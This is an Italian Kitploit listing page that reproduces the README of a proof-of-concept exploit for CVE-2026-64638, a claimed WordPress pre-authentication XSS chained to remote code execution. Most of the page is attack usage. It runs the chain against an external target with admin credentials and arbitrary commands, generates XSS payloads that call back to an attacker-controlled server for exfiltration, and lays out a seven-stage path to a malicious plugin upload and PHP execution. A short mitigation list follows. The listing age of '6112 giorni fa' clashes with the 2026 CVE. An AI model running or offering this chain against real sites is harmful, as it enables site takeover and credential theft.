Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-64638-POC — CVE-2026-64638: PoC di XSS pre-autenticazione su WordPress → RCE (XSS2Shell) | Kitploit
Strumenti/GitHubGitHub/imbas007/cve-2026-64638-poc
Scanner di Vulnerabilità WebGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubimbas007/cve-2026-64638-poc

CVE-2026-64638-POC

CVE-2026-64638: PoC di XSS pre-autenticazione su WordPress → RCE (XSS2Shell)

Vedi Repository
6112 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2026-64638 — XSS2Shell

XSS riflesso pre-autenticazione → Esecuzione remota di codice nel core di WordPress

License WordPress CVE

⚠️ DISCLAIMER: Questo repository è destinato esclusivamente a ricerca di sicurezza autorizzata e scopi didattici. Non utilizzarlo contro sistemi di cui non si è proprietari o per i quali non si dispone di esplicita autorizzazione scritta. L'accesso non autorizzato è illegale. Vedi SECURITY.md.


Panoramica

CVE-2026-64638 è una XSS riflessa pre-autenticazione nel pipeline di elaborazione di login/wplogin del core di WordPress. Il difetto deriva da un differenziale tra parser: l'input malformato sopravvive a strip_tags() di PHP ma viene successivamente ricostruito come HTML da wp_kses_post(), consentendo al markup controllato dall'attaccante di raggiungere il DOM.

I ricercatori di pwn.ai hanno dimostrato XSS2Shell — una catena che porta questa XSS alla piena esecuzione di codice PHP su un'installazione WordPress predefinita quando un amministratore autenticato interagisce con contenuti controllati dall'attaccante.


Avvio rapido (Docker)

root@kitploit:~
git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC

# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain

Cosa succede:

root@kitploit:~
[STAGE 1] WordPress 7.0.2 → VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE → uid=33(www-data)

Tutti i comandi

root@kitploit:~
./test.sh up         # Start Docker + install WordPress (admin/admin123)
./test.sh scan       # Detect version & patch status
./test.sh chain      # Run full XSS2Shell RCE chain
./test.sh all        # up + scan + chain (all-in-one)
./test.sh down       # Stop containers
./test.sh clean      # Stop + remove all volumes

# Or with Make
make up              # Start Docker
make install         # Install WordPress
make scan            # Check vulnerability
make gen-xss         # Generate XSS payload URL
make test-chain      # Full RCE chain
make serve           # Start callback server on :8080
make down            # Stop containers

Struttura del repository

root@kitploit:~
CVE-2026-64638-POC/
├── README.md
├── SECURITY.md              # Security policy & disclaimer
├── docker-compose.yml        # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile                  # Shortcut commands
├── test.sh                   # Automated test suite
├── requirements.txt          # Python dependencies
│
├── xss2shell_chain.py       # [MAIN] Full chain: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py     # Version detection + username reflection test
├── xss2shell_checker.py     # Lightweight patch checker (safe, non-exploitative)
├── exploit_server.py        # Callback server for XSS exfiltration
├── xss_payload.html         # Interactive XSS PoC (browser)
│
└── docs/
    ├── CHAIN.md             # Technical breakdown of all 7 chain stages
    ├── MITIGATION.md        # Defensive guidance + detection rules
    └── PAYLOAD_NOTES.md     # Notes on the CVE-specific bypass payload

Utilizzo manuale (target esterno)

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt

# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com

# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080

# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
    -u https://target.example.com \
    --user admin --pass "password" \
    --cmd "id"

# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"

La catena di attacco XSS2Shell

Vedi docs/CHAIN.md per tutti i dettagli.

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Reflected XSS on wp-login.php (failed-login error page)    │
│  2. DOM clobbering to manipulate page context                   │
│  3. JSONP / Same-Origin Method Execution (SOME)                 │
│  4. Application Password creation via REST API                  │
│  5. REST API access with stolen Application Password            │
│  6. Malicious plugin/theme upload                               │
│  7. PHP code execution → full RCE                               │
└─────────────────────────────────────────────────────────────────┘

Nota: Le fasi 3-7 richiedono un amministratore con sessione attiva che interagisca con il payload XSS. La vulnerabilità è pre-autenticazione, ma la catena RCE completa richiede accesso a livello di amministratore per essere completata.


Mitigazione

  1. Aggiornare immediatamente WordPress alla 7.0.3 o successiva
  2. Abilitare gli aggiornamenti automatici in background
  3. Controllare le password applicazione (Utenti → Profilo)
  4. Esaminare i log per username di login falliti sospetti
  5. Monitorare l'attività di caricamento di plugin e temi

Vedi docs/MITIGATION.md per regole dettagliate di hardening e rilevamento.


Riferimenti

  • WordPress 7.0.3 Security Release
  • pwn.ai XSS2Shell Blog
  • pwn.ai SOME/CSP Bypass Writeup
  • The Hacker News Coverage
  • The CyberSec Guru Article
  • CVE Record

Autore

Ricerca sulla sicurezza e PoC. Solo per uso didattico.

Licenza

MIT — Vedi LICENSE

Scarica lo strumento
ProprietàValore
CVECVE-2026-64638
CVSS8.9
TipoCatena XSS riflessa → RCE
ComponentePagina di login del core di WordPress
Versioni interessateWordPress < 7.0.3 (backport fino alla 4.7)
Corretta inWordPress 7.0.3 (6 agosto 2026)
Causa principaleDifferenziale di parser: strip_tags() vs wp_kses_post()